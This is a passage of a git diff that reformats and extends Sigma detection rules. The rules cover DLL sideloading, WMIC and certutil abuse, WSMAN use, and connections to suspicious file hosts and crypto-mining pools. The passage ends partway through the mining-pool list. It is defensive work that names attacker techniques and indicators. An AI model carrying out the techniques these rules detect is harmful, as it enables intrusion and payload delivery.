a/sigma/sysmon/image_load/image_load_side_load_rjvplatform_non_default_location.yml +++ b/sigma/sysmon/image_load/image_load_side_load_rjvplatform_non_default_location.yml @@ -1,8 +1,7 @@ title: Potential RjvPlatform.DLL Sideloading From Non-Default Location id: 0e0bc253-07ed-43f1-816d-e1b220fe8971 status: experimental -description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" - located in a non-default location. +description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location. references: - https://twitter.com/0gtweet/status/1666716511988330499 author: X__Junior (Nextron Systems) diff --git a/sigma/sysmon/image_load/image_load_side_load_robform.yml b/sigma/sysmon/image_load/image_load_side_load_robform.yml index 6202f5942..bd904db56 100644 --- a/sigma/sysmon/image_load/image_load_side_load_robform.yml +++ b/sigma/sysmon/image_load/image_load_side_load_robform.yml @@ -1,8 +1,7 @@ title: Potential RoboForm.DLL Sideloading id: f64c9b2d-b0ad-481d-9d03-7fc75020892a status: experimental -description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm - Password Manager +description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager references: - https://twitter.com/StopMalvertisin/status/1648604148848549888 - https://twitter.com/t3ft3lb/status/1656194831830401024 @@ -35,7 +34,6 @@ detection: - \robotaskbaricon-x64.exe condition: image_load and (selection and not 1 of filter_main_*) falsepositives: - - If installed on a per-user level, the path would be located in "AppData\Local". - Add additional filters to reflect this mode of installation + - If installed on a per-user level, the path would be located in "AppData\Local". Add additional filters to reflect this mode of installation level: medium ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_side_load_shell_chrome_api.yml b/sigma/sysmon/image_load/image_load_side_load_shell_chrome_api.yml index 2be88ba36..82e78ade8 100644 --- a/sigma/sysmon/image_load/image_load_side_load_shell_chrome_api.yml +++ b/sigma/sysmon/image_load/image_load_side_load_shell_chrome_api.yml @@ -1,17 +1,12 @@ title: DLL Sideloading Of ShellChromeAPI.DLL id: ee4c5d06-3abc-48cc-8885-77f1c20f4451 related: - - id: e173ad47-4388-4012-ae62-bd13f71c18a8 - type: similar + - id: e173ad47-4388-4012-ae62-bd13f71c18a8 + type: similar status: test -description: 'Detects processes loading the non-existent DLL "ShellChromeAPI". One - known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" - flag tries to load this DLL. - - Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe - using this parameter - - ' +description: | + Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. + Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter references: - https://mobile.twitter.com/0gtweet/status/1564131230941122561 - https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html @@ -32,6 +27,7 @@ detection: EventID: 7 Channel: Microsoft-Windows-Sysmon/Operational selection: + # The DLL shouldn't exist on Windows anymore. If for some reason you still have it. You could filter out legitimate calls ImageLoaded|endswith: \ShellChromeAPI.dll condition: image_load and selection falsepositives: diff --git a/sigma/sysmon/image_load/image_load_side_load_shelldispatch.yml b/sigma/sysmon/image_load/image_load_side_load_shelldispatch.yml index 595711497..16fe14edf 100644 --- a/sigma/sysmon/image_load/image_load_side_load_shelldispatch.yml +++ b/sigma/sysmon/image_load/image_load_side_load_shelldispatch.yml @@ -22,10 +22,10 @@ detection: selection: ImageLoaded|endswith: \ShellDispatch.dll filter_main_legit_path: - - ImageLoaded|contains|all: - - :\Users\ - - \AppData\Local\Temp\ - - ImageLoaded|contains: :\Windows\Temp\ + - ImageLoaded|contains|all: + - :\Users\ + - \AppData\Local\Temp\ + - ImageLoaded|contains: :\Windows\Temp\ condition: image_load and (selection and not 1 of filter_main_*) falsepositives: - Some installers may trigger some false positives diff --git a/sigma/sysmon/image_load/image_load_side_load_smadhook.yml b/sigma/sysmon/image_load/image_load_side_load_smadhook.yml index b581b49f1..9dd71dcba 100644 --- a/sigma/sysmon/image_load/image_load_side_load_smadhook.yml +++ b/sigma/sysmon/image_load/image_load_side_load_smadhook.yml @@ -1,8 +1,7 @@ title: Potential SmadHook.DLL Sideloading id: 24b6cf51-6122-469e-861a-22974e9c1e5b status: experimental -description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV - antivirus +description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus references: - https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/ - https://www.qurium.org/alerts/targeted-malware-against-crph/ diff --git a/sigma/sysmon/image_load/image_load_side_load_third_party.yml b/sigma/sysmon/image_load/image_load_side_load_third_party.yml index 8cf526711..4ff9cb6f8 100644 --- a/sigma/sysmon/image_load/image_load_side_load_third_party.yml +++ b/sigma/sysmon/image_load/image_load_side_load_third_party.yml @@ -1,10 +1,9 @@ title: Third Party Software DLL Sideloading id: f9df325d-d7bc-4a32-8a1a-2cc61dcefc63 status: test -description: Detects DLL sideloading of DLLs that are part of third party software - (zoom, discord....etc) +description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc) references: - - https://hijacklibs.net/ + - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there) author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) date: 2022/08/17 tags: @@ -18,24 +17,31 @@ logsource: category: image_load product: windows detection: + # Lenovo image_load: EventID: 7 Channel: Microsoft-Windows-Sysmon/Operational selection_lenovo: ImageLoaded|endswith: \commfunc.dll filter_lenovo: - - ImageLoaded|contains: \AppData\local\Google\Chrome\Application\ - - ImageLoaded|startswith: - - C:\Program Files\Lenovo\Communications Utility\ - - C:\Program Files (x86)\Lenovo\Communications Utility\ + - ImageLoaded|contains: \AppData\local\Google\Chrome\Application\ + - ImageLoaded|startswith: + - C:\Program Files\Lenovo\Communications Utility\ + - C:\Program Files (x86)\Lenovo\Communications Utility\ + # Toshiba selection_toshiba: ImageLoaded|endswith: \tosbtkbd.dll filter_toshiba: ImageLoaded|startswith: - C:\Program Files\Toshiba\Bluetooth Toshiba Stack\ - C:\Program Files (x86)\Toshiba\Bluetooth Toshiba Stack\ - condition: image_load and ((selection_lenovo and not filter_lenovo) or (selection_toshiba - and not filter_toshiba)) + # Zoom (FP with System32) + # selection_zoom: + # ImageLoaded|endswith: '\version.dll' + # filter_zoom: + # ImageLoaded|startswith: 'C:\Users\' + # ImageLoaded|contains: '\AppData\Roaming\Zoom\bin\' + condition: image_load and ((selection_lenovo and not filter_lenovo) or (selection_toshiba and not filter_toshiba)) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/image_load/image_load_side_load_ualapi.yml b/sigma/sysmon/image_load/image_load_side_load_ualapi.yml index 0220cba36..084aa29f1 100644 --- a/sigma/sysmon/image_load/image_load_side_load_ualapi.yml +++ b/sigma/sysmon/image_load/image_load_side_load_ualapi.yml @@ -1,8 +1,7 @@ title: Fax Service DLL Search Order Hijack id: 828af599-4c53-4ed2-ba4a-a9f835c434ea status: test -description: The Fax service attempts to load ualapi.dll, which is non-existent. An - attacker can then (side)load their own malicious DLL using this service. +description: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service. references: - https://windows-internals.com/faxing-your-way-to-system/ author: NVISO diff --git a/sigma/sysmon/image_load/image_load_side_load_vmguestlib.yml b/sigma/sysmon/image_load/image_load_side_load_vmguestlib.yml index af3b994c8..a1a4d5b7f 100644 --- a/sigma/sysmon/image_load/image_load_side_load_vmguestlib.yml +++ b/sigma/sysmon/image_load/image_load_side_load_vmguestlib.yml @@ -29,7 +29,6 @@ detection: Signed: 'true' condition: image_load and (selection and not filter) falsepositives: - - FP could occur if the legitimate version of vmGuestLib already exists on the - system + - FP could occur if the legitimate version of vmGuestLib already exists on the system level: medium ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_side_load_vmmap_dbghelp_signed.yml b/sigma/sysmon/image_load/image_load_side_load_vmmap_dbghelp_signed.yml index 03dffc1f7..c533fb888 100644 --- a/sigma/sysmon/image_load/image_load_side_load_vmmap_dbghelp_signed.yml +++ b/sigma/sysmon/image_load/image_load_side_load_vmmap_dbghelp_signed.yml @@ -1,11 +1,10 @@ title: VMMap Signed Dbghelp.DLL Potential Sideloading id: 98ffaed4-aec2-4e04-9b07-31492fe68b3d related: - - id: 273a8dd8-3742-4302-bcc7-7df5a80fe425 - type: similar + - id: 273a8dd8-3742-4302-bcc7-7df5a80fe425 + type: similar status: experimental -description: Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals - VMMap. +description: Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap. references: - https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766 author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/image_load/image_load_side_load_vmmap_dbghelp_unsigned.yml b/sigma/sysmon/image_load/image_load_side_load_vmmap_dbghelp_unsigned.yml index 945ebb5f1..eb6947876 100644 --- a/sigma/sysmon/image_load/image_load_side_load_vmmap_dbghelp_unsigned.yml +++ b/sigma/sysmon/image_load/image_load_side_load_vmmap_dbghelp_unsigned.yml @@ -1,11 +1,10 @@ title: VMMap Unsigned Dbghelp.DLL Potential Sideloading id: 273a8dd8-3742-4302-bcc7-7df5a80fe425 related: - - id: 98ffaed4-aec2-4e04-9b07-31492fe68b3d - type: similar + - id: 98ffaed4-aec2-4e04-9b07-31492fe68b3d + type: similar status: experimental -description: Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals - VMMap. +description: Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap. references: - https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766 author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/image_load/image_load_side_load_vmware_xfer.yml b/sigma/sysmon/image_load/image_load_side_load_vmware_xfer.yml index 0520aeedb..6fed1e780 100644 --- a/sigma/sysmon/image_load/image_load_side_load_vmware_xfer.yml +++ b/sigma/sysmon/image_load/image_load_side_load_vmware_xfer.yml @@ -1,8 +1,7 @@ title: Potential DLL Sideloading Via VMware Xfer id: 9313dc13-d04c-46d8-af4a-a930cc55d93b status: test -description: Detects loading of a DLL by the VMware Xfer utility from the non-default - directory which may be an attempt to sideload arbitrary DLL +description: Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL references: - https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/ author: Nasreddine Bencherchali (Nextron Systems) @@ -22,7 +21,7 @@ detection: selection: Image|endswith: \VMwareXferlogs.exe ImageLoaded|endswith: \glib-2.0.dll - filter: + filter: # VMware might be installed in another path so update the rule accordingly ImageLoaded|startswith: C:\Program Files\VMware\ condition: image_load and (selection and not filter) falsepositives: diff --git a/sigma/sysmon/image_load/image_load_side_load_waveedit.yml b/sigma/sysmon/image_load/image_load_side_load_waveedit.yml index 75a7d7d21..5f6748702 100644 --- a/sigma/sysmon/image_load/image_load_side_load_waveedit.yml +++ b/sigma/sysmon/image_load/image_load_side_load_waveedit.yml @@ -1,8 +1,7 @@ title: Potential Waveedit.DLL Sideloading id: 71b31e99-9ad0-47d4-aeb5-c0ca3928eeeb status: experimental -description: Detects potential DLL sideloading of "waveedit.dll", which is part of - the Nero WaveEditor audio editing software. +description: Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software. references: - https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html author: X__Junior (Nextron Systems) diff --git a/sigma/sysmon/image_load/image_load_side_load_wazuh.yml b/sigma/sysmon/image_load/image_load_side_load_wazuh.yml index b7c23d8d7..2168a50db 100644 --- a/sigma/sysmon/image_load/image_load_side_load_wazuh.yml +++ b/sigma/sysmon/image_load/image_load_side_load_wazuh.yml @@ -1,8 +1,7 @@ title: Potential Wazuh Security Platform DLL Sideloading id: db77ce78-7e28-4188-9337-cf30e2b3ba9f status: experimental -description: Detects potential DLL side loading of DLLs that are part of the Wazuh - security platform +description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform references: - https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html author: X__Junior (Nextron Systems) @@ -31,13 +30,14 @@ detection: - C:\Program Files\ - C:\Program Files (x86)\ filter_optional_mingw64: + # Note: Many third party apps installed in "AppData" or "ProgramData" and leverage "mingw64" make use of "libwinpthread-1.dll" + # In production its best to make a list of these apps and replace this filter with a specific one. ImageLoaded|contains: - \AppData\Local\ - \ProgramData\ ImageLoaded|endswith: \mingw64\bin\libwinpthread-1.dll condition: image_load and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Many legitimate applications leverage this DLL. (Visual Studio, JetBrains, Ruby, - Anaconda, GithubDesktop, etc.) + - Many legitimate applications leverage this DLL. (Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.) level: medium ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_side_load_windows_defender.yml b/sigma/sysmon/image_load/image_load_side_load_windows_defender.yml index d6ba748c8..7ca31893a 100644 --- a/sigma/sysmon/image_load/image_load_side_load_windows_defender.yml +++ b/sigma/sysmon/image_load/image_load_side_load_windows_defender.yml @@ -1,11 +1,10 @@ title: Potential Mpclient.DLL Sideloading id: 418dc89a-9808-4b87-b1d7-e5ae0cb6effc related: - - id: 7002aa10-b8d4-47ae-b5ba-51ab07e228b9 - type: similar + - id: 7002aa10-b8d4-47ae-b5ba-51ab07e228b9 + type: similar status: experimental -description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes - ("MpCmdRun" and "NisSrv") from their non-default directory. +description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool author: Bhabesh Raj diff --git a/sigma/sysmon/image_load/image_load_susp_clickonce_unsigned_module_loaded.yml b/sigma/sysmon/image_load/image_load_susp_clickonce_unsigned_module_loaded.yml index d635f8cfc..3e6eda90a 100644 --- a/sigma/sysmon/image_load/image_load_susp_clickonce_unsigned_module_loaded.yml +++ b/sigma/sysmon/image_load/image_load_susp_clickonce_unsigned_module_loaded.yml @@ -20,8 +20,8 @@ detection: selection_path: Image|contains: \AppData\Local\Apps\2.0\ selection_sig_status: - - Signed: 'false' - - SignatureStatus: Expired + - Signed: 'false' + - SignatureStatus: Expired condition: image_load and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/image_load/image_load_susp_dll_load_system_process.yml b/sigma/sysmon/image_load/image_load_susp_dll_load_system_process.yml index dfcf5ed4e..e5546853f 100644 --- a/sigma/sysmon/image_load/image_load_susp_dll_load_system_process.yml +++ b/sigma/sysmon/image_load/image_load_susp_dll_load_system_process.yml @@ -1,9 +1,7 @@ title: DLL Load By System Process From Suspicious Locations id: 9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c status: experimental -description: Detects when a system process (i.e. located in system32, syswow64, etc.) - loads a DLL from a suspicious location or a location with permissive permissions - such as "C:\Users\Public" +description: Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public" references: - https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea) author: Nasreddine Bencherchali (Nextron Systems) @@ -23,6 +21,7 @@ detection: selection: Image|startswith: C:\Windows\ ImageLoaded|startswith: + # TODO: Add more suspicious paths as you see fit in your env - C:\Users\Public\ - C:\PerfLogs\ condition: image_load and selection diff --git a/sigma/sysmon/image_load/image_load_susp_python_image_load.yml b/sigma/sysmon/image_load/image_load_susp_python_image_load.yml index 30a8f625c..04941df06 100644 --- a/sigma/sysmon/image_load/image_load_susp_python_image_load.yml +++ b/sigma/sysmon/image_load/image_load_susp_python_image_load.yml @@ -1,8 +1,7 @@ title: Python Image Load By Non-Python Process id: cbb56d62-4060-40f7-9466-d8aaf3123f83 status: experimental -description: Detects the image load of "Python Core" by a non-Python process. This - might be indicative of a Python script bundled with Py2Exe. +description: Detects the image load of "Python Core" by a non-Python process. This might be indicative of a Python script bundled with Py2Exe. references: - https://www.py2exe.org/ - https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/ @@ -23,13 +22,13 @@ detection: selection: Description: Python Core filter_main_generic: - - Image|contains: Python - - Image|startswith: - - C:\Program Files\ - - C:\Program Files (x86)\ - - C:\ProgramData\Anaconda3\ + - Image|contains: Python # FPs with python38.dll, python.exe etc. + - Image|startswith: + - C:\Program Files\ + - C:\Program Files (x86)\ + - C:\ProgramData\Anaconda3\ # Comment out if you don't use Anaconda in your environment filter_optional_aurora: - Image: null + Image: condition: image_load and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Legitimate Py2Exe Binaries diff --git a/sigma/sysmon/image_load/image_load_susp_script_dotnet_clr_dll_load.yml b/sigma/sysmon/image_load/image_load_susp_script_dotnet_clr_dll_load.yml index d8d246ff4..7f5d1fb88 100644 --- a/sigma/sysmon/image_load/image_load_susp_script_dotnet_clr_dll_load.yml +++ b/sigma/sysmon/image_load/image_load_susp_script_dotnet_clr_dll_load.yml @@ -1,8 +1,7 @@ title: DotNet CLR DLL Loaded By Scripting Applications id: 4508a70e-97ef-4300-b62b-ff27992990ea status: test -description: Detects .NET CLR DLLs being loaded by scripting applications such as - wscript or cscript. This could be an indication of potential suspicious execution. +description: Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution. references: - https://github.com/tyranid/DotNetToJScript - https://thewover.github.io/Introducing-Donut/ @@ -30,6 +29,7 @@ detection: - \mshta.exe - \msxsl.exe - \regsvr32.exe + # - '\svchost.exe' - \wmic.exe - \wscript.exe ImageLoaded|endswith: diff --git a/sigma/sysmon/image_load/image_load_susp_uncommon_image_load.yml b/sigma/sysmon/image_load/image_load_susp_uncommon_image_load.yml index d94085a0a..abf4754ac 100644 --- a/sigma/sysmon/image_load/image_load_susp_uncommon_image_load.yml +++ b/sigma/sysmon/image_load/image_load_susp_uncommon_image_load.yml @@ -1,8 +1,7 @@ title: Possible Process Hollowing Image Loading id: e32ce4f5-46c6-4c47-ba69-5de3c9193cd7 status: test -description: Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. - through process hollowing by Mimikatz +description: Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz references: - https://web.archive.org/web/20220815065318/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html author: Markus Neis diff --git a/sigma/sysmon/image_load/image_load_thor_unsigned_execution.yml b/sigma/sysmon/image_load/image_load_thor_unsigned_execution.yml index a20e439b1..cd65034e1 100644 --- a/sigma/sysmon/image_load/image_load_thor_unsigned_execution.yml +++ b/sigma/sysmon/image_load/image_load_thor_unsigned_execution.yml @@ -30,7 +30,6 @@ detection: Signature: Nextron Systems GmbH condition: image_load and (selection and not filter_main) falsepositives: - - Other legitimate binaries named "thor.exe" that aren't published by Nextron - Systems + - Other legitimate binaries named "thor.exe" that aren't published by Nextron Systems level: high ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_uac_bypass_iscsicpl.yml b/sigma/sysmon/image_load/image_load_uac_bypass_iscsicpl.yml index bd4d89796..4295a0cac 100644 --- a/sigma/sysmon/image_load/image_load_uac_bypass_iscsicpl.yml +++ b/sigma/sysmon/image_load/image_load_uac_bypass_iscsicpl.yml @@ -1,9 +1,7 @@ title: UAC Bypass Using Iscsicpl - ImageLoad id: 9ed5959a-c43c-4c59-84e3-d28628429456 status: test -description: Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL - Search Order hijacking technique to load a custom DLL's from temp or a any user - controlled location in the users %PATH% +description: Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH% references: - https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC - https://twitter.com/wdormann/status/1547583317410607110 diff --git a/sigma/sysmon/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml b/sigma/sysmon/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml index e2fd998c0..eec7c6bac 100644 --- a/sigma/sysmon/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml +++ b/sigma/sysmon/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml @@ -1,9 +1,7 @@ title: WMIC Loading Scripting Libraries id: 06ce37c2-61ab-4f05-9ff5-b1a96d18ae32 status: test -description: Detects threat actors proxy executing code and bypassing application - controls by leveraging wmic and the `/FORMAT` argument switch to download and - execute an XSL file (i.e js, vbs, etc). +description: Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc). references: - https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html - https://twitter.com/dez_/status/986614411711442944 @@ -31,9 +29,6 @@ detection: falsepositives: - The command wmic os get lastboottuptime loads vbscript.dll - The command wmic os get locale loads vbscript.dll - - Since the ImageLoad event doesn't have enough information in this case. It's - better to look at the recent process creation events that spawned the WMIC - process and investigate the command line and parent/child processes to get - more insights + - Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights level: medium ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml b/sigma/sysmon/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml index 04a9bc793..d865eb50f 100644 --- a/sigma/sysmon/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml +++ b/sigma/sysmon/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml @@ -1,8 +1,7 @@ title: Wmiprvse Wbemcomn DLL Hijack id: 7707a579-e0d8-4886-a853-ce47e4575aaa status: test -description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` - directory over the network and loading it for a WMI DLL Hijack scenario. +description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. references: - https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) diff --git a/sigma/sysmon/image_load/image_load_wsman_provider_image_load.yml b/sigma/sysmon/image_load/image_load_wsman_provider_image_load.yml index 8fc68ba1a..c027a0ee6 100644 --- a/sigma/sysmon/image_load/image_load_wsman_provider_image_load.yml +++ b/sigma/sysmon/image_load/image_load_wsman_provider_image_load.yml @@ -1,8 +1,7 @@ title: Suspicious WSMAN Provider Image Loads id: ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94 status: test -description: Detects signs of potential use of the WSMAN provider from uncommon processes - locally and remote execution. +description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution. references: - https://twitter.com/chadtilbury/status/1275851297770610688 - https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/ @@ -25,14 +24,14 @@ detection: EventID: 7 Channel: Microsoft-Windows-Sysmon/Operational request_client: - - ImageLoaded|endswith: - - \WsmSvc.dll - - \WsmAuto.dll - - \Microsoft.WSMan.Management.ni.dll - - OriginalFileName: - - WsmSvc.dll - - WSMANAUTOMATION.DLL - - Microsoft.WSMan.Management.dll + - ImageLoaded|endswith: + - \WsmSvc.dll + - \WsmAuto.dll + - \Microsoft.WSMan.Management.ni.dll + - OriginalFileName: + - WsmSvc.dll + - WSMANAUTOMATION.DLL + - Microsoft.WSMan.Management.dll respond_server: Image|endswith: \svchost.exe OriginalFileName: WsmWmiPl.dll @@ -41,13 +40,13 @@ detection: - \powershell.exe - C:\Windows\System32\sdiagnhost.exe - C:\Windows\System32\services.exe - filter_svchost: - CommandLine|contains: + filter_svchost: # not available in Sysmon data, but Aurora logs + CommandLine|contains: - svchost.exe -k netsvcs -p -s BITS - svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc - svchost.exe -k NetworkService -p -s Wecsvc - svchost.exe -k netsvcs - filter_mscorsvw: + filter_mscorsvw: # Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe Image|startswith: - C:\Windows\Microsoft.NET\Framework64\v - C:\Windows\Microsoft.NET\Framework\v @@ -67,9 +66,8 @@ detection: svchost: Image|endswith: \svchost.exe commandline_null: - CommandLine: null - condition: image_load and (( request_client or respond_server ) and not 1 of filter* - and not ( svchost and commandline_null )) + CommandLine: + condition: image_load and (( request_client or respond_server ) and not 1 of filter* and not ( svchost and commandline_null )) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/network_connection/net_connection_win_addinutil.yml b/sigma/sysmon/network_connection/net_connection_win_addinutil.yml index 8b7f189a6..bf2a41d85 100644 --- a/sigma/sysmon/network_connection/net_connection_win_addinutil.yml +++ b/sigma/sysmon/network_connection/net_connection_win_addinutil.yml @@ -1,8 +1,7 @@ title: Network Connection Initiated By AddinUtil.EXE id: 5205613d-2a63-4412-a895-3a2458b587b3 status: experimental -description: Detects network connections made by the Add-In deployment cache updating - utility (AddInutil.exe), which could indicate command and control communication. +description: Detects network connections made by the Add-In deployment cache updating utility (AddInutil.exe), which could indicate command and control communication. references: - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) diff --git a/sigma/sysmon/network_connection/net_connection_win_binary_susp_com.yml b/sigma/sysmon/network_connection/net_connection_win_binary_susp_com.yml index 00c804bc7..15afd2ed6 100644 --- a/sigma/sysmon/network_connection/net_connection_win_binary_susp_com.yml +++ b/sigma/sysmon/network_connection/net_connection_win_binary_susp_com.yml @@ -1,8 +1,8 @@ title: Microsoft Binary Suspicious Communication Endpoint id: e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97 related: - - id: 635dbb88-67b3-4b41-9ea5-a3af2dd88153 - type: obsoletes + - id: 635dbb88-67b3-4b41-9ea5-a3af2dd88153 + type: obsoletes status: test description: Detects an executable in the Windows folder accessing suspicious domains references: @@ -26,16 +26,16 @@ detection: EventID: 3 Channel: Microsoft-Windows-Sysmon/Operational selection_paths: - - Image|startswith: - - C:\PerfLogs - - C:\Temp\ - - C:\Users\Public\ - - C:\Windows\ - - Image|contains: \AppData\Temp\ + - Image|startswith: + - C:\PerfLogs + - C:\Temp\ + - C:\Users\Public\ + - C:\Windows\ + - Image|contains: \AppData\Temp\ selection_domains: Initiated: 'true' DestinationHostname|endswith: - - .githubusercontent.com + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) - anonfiles.com - cdn.discordapp.com - cdn.discordapp.com/attachments/ diff --git a/sigma/sysmon/network_connection/net_connection_win_certutil_initiated_connection.yml b/sigma/sysmon/network_connection/net_connection_win_certutil_initiated_connection.yml index f2655b3a4..62d91ba9f 100644 --- a/sigma/sysmon/network_connection/net_connection_win_certutil_initiated_connection.yml +++ b/sigma/sysmon/network_connection/net_connection_win_certutil_initiated_connection.yml @@ -1,11 +1,9 @@ title: Connection Initiated Via Certutil.EXE id: 0dba975d-a193-4ed1-a067-424df57570d1 status: test -description: 'Detects a network connection initiated by the certutil.exe tool. - +description: | + Detects a network connection initiated by the certutil.exe tool. Attackers can abuse the utility in order to download malware or additional payloads. - - ' references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil author: frack113, Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/network_connection/net_connection_win_crypto_mining_pools.yml b/sigma/sysmon/network_connection/net_connection_win_crypto_mining_pools.yml index 851d34f5c..5e0422783 100644 --- a/sigma/sysmon/network_connection/net_connection_win_crypto_mining_pools.yml +++ b/sigma/sysmon/network_connection/net_connection_win_crypto_mining_pools.yml @@ -5,9 +5,10 @@ description: Detects initiated network connections to crypto mining pools references: - https://www.poolwatch.io/coin/monero - https://github.com/stamparm/maltrail/blob/3ea70459b9559134449423c0a7d8b965ac5c40ea/trails/static/suspicious/crypto_mining.txt + - https://www.virustotal.com/gui/search/behaviour_network%253A*.miningocean.org/files author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) date: 2021/10/26 -modified: 2023/04/18 +modified: 2024/01/19 tags: - attack.impact - attack.t1496 @@ -26,6 +27,12 @@ detection: - bcn.pool.minergate.com - bcn.vip.pool.minergate.com - bohemianpool.com + - ca-aipg.miningocean.org + - ca-dynex.miningocean.org + - ca-neurai.miningocean.org + - ca-qrl.miningocean.org + - ca-upx.miningocean.org + - ca-zephyr.miningocean.org - ca.minexmr.com - ca.monero.herominers.com - cbd.monerpool.org @@ -37,6 +44,9 @@ detection: - d1pool.ddns.net - d5pool.us - daili01.monerpool.org + - de-aipg.miningocean.org + - de-dynex.miningocean.org + - de-zephyr.miningocean.org - de.minexmr.com - dl.nbminer.com - donate.graef.in @@ -54,9 +64,21 @@ detection: - eu.minerpool.pw - fcn-xmr.pool.minergate.com - fee.xmrig.com + - fr-aipg.miningocean.org + - fr-dynex.miningocean.org + - fr-neurai.miningocean.org + - fr-qrl.miningocean.org + - fr-upx.miningocean.org + - fr-zephyr.miningocean.org - fr.minexmr.com - hellominer.com - herominers.com + - hk-aipg.miningocean.org + - hk-dynex.miningocean.org + - hk-neurai.miningocean.org + - hk-qrl.miningocean.org + - 